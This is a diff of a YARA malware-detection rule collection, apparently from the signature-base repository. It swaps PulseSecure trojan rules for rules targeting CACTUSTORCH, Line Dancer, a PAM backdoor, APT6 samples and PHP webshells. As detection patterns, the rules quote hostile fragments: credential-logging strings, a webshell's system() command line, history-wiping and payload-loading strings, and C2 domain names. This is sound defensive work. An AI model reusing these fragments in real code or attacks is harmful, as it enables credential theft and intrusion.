-		$sb2 = { 8B 95 [4] B8 [4] 8D 8D [4] 89 4C 24 10 8D 8D [4] 89 4C 24 0C 89 54 24 08 89 44 24 04 8D 85 [4] 89 04 24 E8 [4] C7 44 24 08 02 00 00 00 C7 44 24 04 00 00 00 00 8B 45 ?? 89 04 24 E8 [4] 89 45 ?? 8D 85 [4] 89 04 24 E8 [4] 89 44 24 08 8D 85 [4] 89 44 24 04 8B 45 ?? 89 04 24 E8 [4] 8B 45 ?? 89 45 ?? C7 45 ?? 00 00 00 00 [0-16] 83 45 ?? 01 8B 45 ?? 3B 45 0C }
+		$x1 = "$payload = shellcode(%options[\"listener\"], \"true\", \"x86\");" fullword ascii
+		$x2 = "Copy the base64 encoded payload into the code variable below." fullword ascii
+		$x3 = " CACTUSTORCH Payload" ascii
+		$x4 = "ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)" fullword ascii
+		$x5 = "' Author: Vincent Yiu (@vysecurity)" fullword ascii
+		$x6 = "Dim binary : binary = \"rundll32.exe\"" fullword ascii
+		$a1 = "code = code & \"" ascii
+		$a2 = "serialized_obj = serialized_obj & \"" ascii
+		$s1 = "binary = \"rundll32.exe\"" fullword ascii
+		$s2 = "EL.DataType = \"bin.hex\"" fullword ascii
+		$s3 = "Set stm = CreateObject(\"System.IO.MemoryStream\")" fullword ascii
+		$s4 = "var binary = \"rundll32.exe\";" fullword ascii
+		$s5 = "var serialized_obj = \"" ascii
 
 	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
+		( filesize < 800KB and ( 1 of ( $x* ) or ( 1 of ( $a* ) and 1 of ( $s* ) ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux_PACEMAKER : FILE
+
+rule SIGNATURE_BASE_SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "5a20260a-5389-57da-956c-97063fed5015"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L99-L115"
+		description = "Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8bc7460f-a1c4-5157-8c2d-34d3a6c9c7e9"
+		date = "2022-03-03"
+		modified = "2022-03-04"
+		reference = "https://twitter.com/cyb3rops/status/1499514240008437762"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nvidia_leaked_cert.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7881c4de4d57828f7e1cab15687274b"
-		logic_hash = "cf83024cbbd500a301ac3c859b680cd79acabc232ea6f42c23fe9f8918a8d914"
-		score = 75
+		logic_hash = "e7e9e58ec1e3922471ad3ffd4ad9fbb3ac4b3c3841c35d1cd8886607f3cf1ab9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
-	strings:
-		$s1 = "\x00Name:%s || Pwd:%s || AuthNum:%s\x0a\x00"
-		$s2 = "\x00/proc/%d/mem\x00"
-		$s3 = "\x00/proc/%s/maps\x00"
-		$s4 = "\x00/proc/%s/cmdline\x00"
-
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100MB and pe.timestamp > 1646092800 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "VeriSign Class 3 Code Signing 2010 CA" and ( pe.signatures [ i ] . serial == "43:bb:43:7d:60:98:66:28:6d:d8:39:e1:d0:03:09:f5" or pe.signatures [ i ] . serial == "14:78:1b:c8:62:e8:dc:50:3a:55:93:46:f5:dc:c5:18" ) )
 }
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_PULSECHECK_1
+rule SIGNATURE_BASE_Line_Dancer
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "f375fdd8-567b-569b-85f4-af54a35d2a93"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L116-L136"
+		description = "Targets code sections of Line Dancer, a shellcode loader targeting Cisco ASA devices."
+		author = "NCSC"
+		id = "3b49a861-8107-577a-bae1-ae28d424cc13"
+		date = "2024-04-24"
+		modified = "2024-04-29"
+		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_line_dancer_apr24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1"
-		logic_hash = "aba457dd33232ef37ca145c5b7cd9c5fe809730339a55c5e90ac46b4a136f6cb"
+		logic_hash = "179e58274a792bc4a16787d251f5ad25de1271084323e62e153fa6d461e3c07e"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
 
 	strings:
-		$r1 = /while[\x09\x20]{0,32}\(<\w{1,64}>\)[\x09\x20]{0,32}\{\s{1,256}\$\w{1,64}[\x09\x20]{0,32}\.=[\x09\x20]{0,32}\$_;\s{0,256}\}/
-		$s1 = "use Crypt::RC4;"
-		$s2 = "use MIME::Base64"
-		$s3 = "MIME::Base64::decode("
-		$s4 = "popen("
-		$s5 = " .= $_;"
-		$s6 = "print MIME::Base64::encode(RC4("
-		$s7 = "HTTP_X_"
+		$ = { 48 8D 5E 20 48 8D 3D BB FF FF FF BA 20 00 00 00 }
+		$ = { 4C 89 EE 44 89 F2 48 8D 3D 9A 27 00 00 }
+		$ = { 41 FF D7 41 5F 41 5E 41 5D 41 5C 5B 5D 48 C7 C0 01 00 00 00 5F }
 
 	condition:
-		$s1 and $s2 and ( @s3 [ 1 ] < @s4 [ 1 ] ) and ( @s4 [ 1 ] < @s5 [ 1 ] ) and ( @s5 [ 1 ] < @s6 [ 1 ] ) and ( #s7 > 2 ) and $r1
+		all of them
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_PULSEJUMP_1
+rule SIGNATURE_BASE_Lightftp_Fftp_X86_64 : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "690cc347-e60f-5cac-b65d-367ecee69251"
-		date = "2021-04-16"
+		description = "Detects a light FTP server"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b62e990-1d8b-5d30-bb58-1f7f12552834"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L137-L153"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pup_lightftp.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "91ee23ee24e100ba4a943bb4c15adb4c"
-		logic_hash = "c9aa2b9ef8aff14c20ed6597b1a71eafc3e3c181aabf9a3a68df18945207ff86"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "f29a98a4014fc6c026aef4054bc2bee7bde2e9ad7f26f2368fdf0949f50847bb"
+		score = 50
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
+		hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
 
 	strings:
-		$s1 = "open("
-		$s2 = ">>/tmp/"
-		$s3 = "syswrite("
-		$s4 = /\}[\x09\x20]{0,32}elsif[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27](Radius|Samba|AD)[\x22\x27][\x09\x20]{0,32}\)\s{0,128}\{\s{0,128}@\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}&/
+		$s1 = "fftp.cfg" fullword wide
+		$s2 = "220 LightFTP server v1.0 ready" fullword ascii
+		$s3 = "*FTP thread exit*" fullword wide
+		$s4 = "PASS->logon successful" fullword ascii
+		$s5 = "250 Requested file action okay, completed." fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 4 of them
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_QUIETPULSE
+rule SIGNATURE_BASE_Lightftp_Config : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "4c49eef7-b8fa-55d5-8fb8-8964f6f50003"
-		date = "2021-04-16"
+		description = "Detects a light FTP server - config file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "02ee1d04-1425-5dfd-9b9a-cd378aeda311"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L154-L172"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pup_lightftp.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "00575bec8d74e221ff6248228c509a16"
-		logic_hash = "226a56369e141834d4834400bbf1a006bbb6e9b39e16e24b0106bff1a9c202a9"
+		hash = "ce9821213538d39775af4a48550eefa3908323c5"
+		logic_hash = "1e8c06dac9a5910816703ed15bef83116d9e2d9e612fda69697170ed98ee5f60"
 		score = 75
-		quality = 58
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = /open[\x09\x20]{0,32}\(\*STDOUT[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
-		$s2 = /open[\x09\x20]{0,32}\(\*STDERR[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
-		$s3 = /socket[\x09\x20]{0,32}\(SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}PF_UNIX[\x09\x20]{0,32},[\x09\x20]{0,32}SOCK_STREAM[\x09\x20]{0,32},[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{0,128}unlink/
-		$s4 = /bind[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}sockaddr_un\(/
-		$s5 = /listen[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}SOMAXCONN[\x09\x20]{0,32}\)[\x09\x20]{0,32};/
-		$s6 = /my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}fork\([\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{1,128}if[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{0,32}==[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32}\{\s{1,128}exec\(/
+		$s2 = "maxusers=" wide
+		$s6 = "[ftpconfig]" fullword wide
+		$s8 = "accs=readonly" fullword wide
+		$s9 = "[anonymous]" fullword wide
+		$s10 = "accs=" fullword wide
+		$s11 = "pswd=" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xfeff and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_1
+rule SIGNATURE_BASE_MAL_UNC2891_Slapstick : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "1fab6d2f-96e8-5def-a93e-2bddd04e7ec8"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L173-L190"
+		description = "Detects UNC2891 Slapstick pam backdoor"
+		author = "Frank Boldewin (@r3c0nst), slightly modifier by Florian Roth"
+		id = "eb5db507-ac12-5c11-9dd9-ec34b9a80e1c"
+		date = "2022-03-30"
+		modified = "2023-01-05"
+		reference = "https://github.com/fboldewin/YARA-rules/tree/master"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_mal_jan23.yar#L19-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b"
-		logic_hash = "d65a466cc15214d8e26597588c039a6b9fb4637ef8f3b1ebea27f016fbd5cba8"
+		logic_hash = "4bc51a47a1b620c3bb950c287c38a37e528e79f9720fb4d9fa9ebecbeca82036"
 		score = 75
-		quality = 58
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
 
 	strings:
-		$s1 = "->getRealmInfo()->{name}"
-		$s2 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>/
-		$s3 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]realm=\$/
-		$s4 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]username=\$/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]password=\$/
+		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
+		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
+		$str1 = "/proc/self/exe" fullword ascii
+		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
+		$str3 = "pam_sm_authenticate" ascii
+		$str_fr1 = "HISTFILE=/dev/null"
 
 	condition:
-		(@s1 [ 1 ] < @s2 [ 1 ] ) and ( @s2 [ 1 ] < @s3 [ 1 ] ) and $s4 and $s5
+		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_2
+rule SIGNATURE_BASE_APT6_Malware_Sample_Gen : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "dc941935-aec7-54b6-a278-f1453b9785df"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L191-L208"
+		description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "142d2714-f7bf-5725-bf7e-9497be7ed234"
+		date = "2016-04-09"
+		modified = "2023-01-06"
+		reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt6_malware.yar#L8-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
-		logic_hash = "4ade993176c918ec23e99fc585e9ab14d9f9e93a7eca00f2c3b0ebbd13d6ec5b"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "614a6673579630fc254d3c546161647e619df5a03ee6f21434d6cc50be1ed187"
+		score = 80
+		quality = 83
+		tags = "FILE"
+		hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
+		hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
 
 	strings:
-		$s1 = "open(*fd,"
-		$s2 = "syswrite(*fd,"
-		$s3 = "close(*fd);"
-		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/[\w.]{1,128}[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$\w{1,128} ?[\x22\x27],[\x09\x20]{0,32}5000\)/
+		$x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
+		$x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
+		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
+		$s2 = "DUMPTHIN" fullword ascii
+		$s3 = "\"C:\\WINDOWS\\system32\\" ascii
+		$s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
+		$s5 = "/tbedrs.dll" fullword ascii
+		$s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
+		$s7 = "NSIS_Inetc (Mozilla)" fullword ascii
+		$s8 = "/logos.gif" fullword ascii
+		$s9 = "synflood" fullword ascii
+		$s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
+		$s11 = "udpflood" fullword ascii
+		$s12 = "shellcode" fullword ascii
+		$s13 = "&PassWord=" fullword ascii
+		$s14 = "SystemPropertiesProtection.exe" fullword ascii
+		$s15 = "SystemPropertiesRemote.exe" fullword ascii
+		$c1 = "jobcall.org" ascii
+		$c2 = "sportsinfinite.com" ascii
+		$c3 = "milsatcom.us" ascii
+		$c4 = "geographicphotographer.com" ascii
+		$c5 = "snowsmooth.com" ascii
+		$c6 = "goodre.net" ascii
+		$c7 = "gloflabs.com" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 1 of ( $c* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_3
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_3
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "8a597521-c873-5bcc-85e6-5a0a061fffb7"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L209-L226"
+		description = "Web Shell - file h4ntu shell powered by tsoi.php"
+		author = "Florian Roth"
+		id = "2a493748-85eb-561e-98b3-0eed82026510"
+		date = "2014-01-28"
+		modified = "2025-03-21"
+		old_rule_name = "Webshell_h4ntu_shell_powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
-		logic_hash = "025308591e058de284f949fd4f788e4a4f46bb2f6c0e1161237f1f811d8179ba"
-		score = 75
-		quality = 60
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "871e9a057ca3920fcebaec5c2555c2d936d813c0d8bb2a6a69726dee7a796ff8"
+		score = 70
+		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "open(*fd,"
-		$s2 = "syswrite(*fd,"
-		$s3 = "close(*fd);"
-		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/dsstartssh\.statementcounters[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
-		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$username ?[\x22\x27],[\x09\x20]{0,32}\d{4}\)/
+		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_FE_APT_Backdoor_Linux32_SLOWPULSE_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "dd35257f-5b6f-55a6-a709-873ded1f4b72"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L227-L244"
+		description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
+		author = "Florian Roth"
+		id = "0e38b0fc-721a-5591-aeb7-f9dca45b7114"
+		date = "2014-03-29"
+		modified = "2025-03-21"
+		old_rule_name = "Webshell_h4ntu_shell__powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68"
-		logic_hash = "c1d92ea4ed8e5934c8356e1e52092935c53a138e454026737448f7f523ea06be"
-		score = 75
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "3d9b568a66f3e6933b385fed30921883dd7be17863670c648702ae3403b6e8a1"
+		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$sb1 = {FC b9 [4] e8 00 00 00 00 5? 8d b? [4] 8b}
-		$sb2 = {f3 a6 0f 85 [4] b8 03 00 00 00 5? 5? 5?}
-		$sb3 = {9c 60 e8 00 00 00 00 5? 8d [5] 85 ?? 0f 8?}
-		$sb4 = {89 13 8b 51 04 89 53 04 8b 51 08 89 53 08}
-		$sb5 = {8d [5] b9 [4] f3 a6 0f 8?}
+		$x1 = "<title>h4ntu shell"
+		$x2 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
 
 	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
+		filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_STEADYPULSE_1
+rule SIGNATURE_BASE_Webshell_PHP_Sql
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "49457fbb-9288-565f-909d-e8228c21c1e4"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L265-L284"
+		description = "Web Shell - file sql.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L65-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc"
-		logic_hash = "a0e3ebdd02ccf5cc8fc0a83c1d0224aed45dc5094eb85bd855e5b74b34e3aaaf"
-		score = 75
+		hash = "2cf20a207695bbc2311a998d1d795c35"
+		logic_hash = "83049c3c5bce88d239b59accb173e234c3169f59187de17b7e6c2a0aa58a552f"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "parse_parameters"
-		$s2 = "s/\\+/ /g"
-		$s3 = "s/%(..)/pack("
-		$s4 = "MIME::Base64::encode($"
-		$s5 = "$|=1;"
-		$s6 = "RC4("
-		$s7 = "$FORM{'cmd'}"
+		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Malware_JS_Powershell_Obfuscated : FILE
+rule SIGNATURE_BASE_Webshell_PHP_A
 {
 	meta:
-		description = "Unspecified malware - file rechnung_3.js"
+		description = "Web Shell - file a.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7995dd3a-5942-5c48-9e50-64f4964249a7"
-		date = "2017-03-24"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_javascript_powershell.yar#L2-L15"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L80-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1dd745624971f10acb7911433f363b0cf20c8c45344f702d7f3549c58689b371"
-		score = 75
+		hash = "e3b461f7464d81f5022419d87315a90d"
+		logic_hash = "6bdd5fbe9b16f2d84b884239cf3b6453587933c6b0c4308508d10019b4f36e38"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3af15a2d60f946e0c4338c84bd39880652f676dc884057a96a10d7f802215760"
 
 	strings:
-		$x1 = "po\" + \"wer\" + \"sh\" + \"e\" + \"ll\";" fullword ascii
+		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
 
 	condition:
-		filesize < 30KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Go_Modbus_Jul24_1 : FILE
+rule SIGNATURE_BASE_Webshell_Imhapftp_2
 {
 	meta:
-		description = "Detects characteristics reported by Dragos for FrostyGoop ICS malware"
-		author = "Florian Roth"
-		id = "4a1e6bbe-d743-5394-b207-e417b64fa76d"
-		date = "2024-07-23"
-		modified = "2024-07-24"
-		reference = "https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_go_modbus.yar#L2-L28"
+		description = "Web Shell - file iMHaPFtp.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L96-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d992c8159deca0ed2b2a33da3c31fdf0efa9a09ba941d059fa7fc1bad458aed1"
-		score = 75
+		hash = "12911b73bc6a5d313b494102abcf5c57"
